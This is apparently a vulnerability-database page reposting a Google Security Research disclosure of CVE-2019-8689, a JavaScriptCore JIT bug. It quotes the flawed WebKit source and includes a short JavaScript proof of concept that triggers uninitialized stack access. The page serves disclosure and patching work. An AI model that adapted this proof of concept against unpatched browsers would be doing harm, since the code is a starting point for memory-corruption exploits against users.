Vulners
Lucene search
Webkit JSC JIT ArgumentsEliminationPhase::transform Uninitialized Variable Access
🗓️ 29 Aug 2019 00:00:00Reported by Google Security ResearchType 
packetstorm🔗 packetstormsecurity.com👁 229 Views
| Reporter | Title | Published | Views | Family All 148 |
|---|---|---|---|---|
 | Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform Exploit | 29 Aug 201900:00 | – | zdt |
 | Amazon Linux 2 : webkitgtk4 (ALAS-2020-1563) | 11 Nov 202000:00 | – | nessus |
| AlmaLinux 8 : GNOME (ALSA-2019:3553) | 9 Feb 202200:00 | – | nessus |
| Apple TV < 12.4 Multiple Vulnerabilities | 26 Jul 201900:00 | – | nessus |
| Apple iOS < 12.4 Multiple Vulnerabilities | 23 Jul 201900:00 | – | nessus |
| CentOS 8 : GNOME (CESA-2019:3553) | 29 Jan 202100:00 | – | nessus |
| CentOS 7 : webkitgtk4 (RHSA-2020:4035) | 30 Nov 202000:00 | – | nessus |
| Debian DSA-4515-1 : webkit2gtk - security update | 5 Sep 201900:00 | – | nessus |
| FreeBSD : webkit2-gtk3 -- Multiple vulnerabilities (e45c3669-caf2-11e9-851a-dcf3aaa3f3ff) | 3 Sep 201900:00 | – | nessus |
| GLSA-201909-05 : WebkitGTK+: Multiple vulnerabilities | 9 Sep 201900:00 | – | nessus |
10
`https://github.com/WebKit/webkit/blob/94e868c940d46c5745869192d07255331d00102b/Source/JavaScriptCore/dfg/DFGArgumentsEliminationPhase.cpp#L743
case GetByVal: {
...
unsigned numberOfArgumentsToSkip = 0;
if (candidate->op() == PhantomCreateRest)
numberOfArgumentsToSkip = candidate->numberOfArgumentsToSkip();
Node* result = nullptr;
if (m_graph.varArgChild(node, 1)->isInt32Constant()) {
unsigned index = m_graph.varArgChild(node, 1)->asUInt32();
InlineCallFrame* inlineCallFrame = candidate->origin.semantic.inlineCallFrame();
index += numberOfArgumentsToSkip;
bool safeToGetStack;
if (inlineCallFrame) {
safeToGetStack = index < inlineCallFrame->argumentCountIncludingThis - 1;
}
else {
safeToGetStack =
index < static_cast<unsigned>(codeBlock()->numParameters()) - 1;
}
if (safeToGetStack) {
StackAccessData* data;
VirtualRegister arg = virtualRegisterForArgument(index + 1);
if (inlineCallFrame)
arg += inlineCallFrame->stackOffset;
data = m_graph.m_stackAccessData.add(arg, FlushedJSValue);
Node* check = nullptr;
if (!inlineCallFrame || inlineCallFrame->isVarargs()) {
check = insertionSet.insertNode(
nodeIndex, SpecNone, CheckInBounds, node->origin,
m_graph.varArgChild(node, 1), Edge(getArrayLength(candidate), Int32Use));
}
result = insertionSet.insertNode(
nodeIndex, node->prediction(), GetStack, node->origin, OpInfo(data), Edge(check, UntypedUse));
}
}
The above code is trying to inline GetByVal operations on stack-allocated arguments. The problem is, it doesn't check whether "index" is lower than "numberOfArgumentsToSkip", i.e., "index" was overflowed. This bug is exploitable as this can lead to uninitialized variable access under certain circumstances.
PoC:
function inlinee(index, value, ...rest) {
return rest[index | 0]; // GetByVal
}
function opt() {
return inlinee(-1, 0x1234); // or inlinee(0xffffffff, 0x1234)
}
inlinee(0, 0);
for (let i = 0; i < 1000000; i++) {
opt();
}
print(opt()); // 0x1234
Related CVE Numbers: CVE-2019-8689.
Found by: [email protected]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Aug 2019 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.33597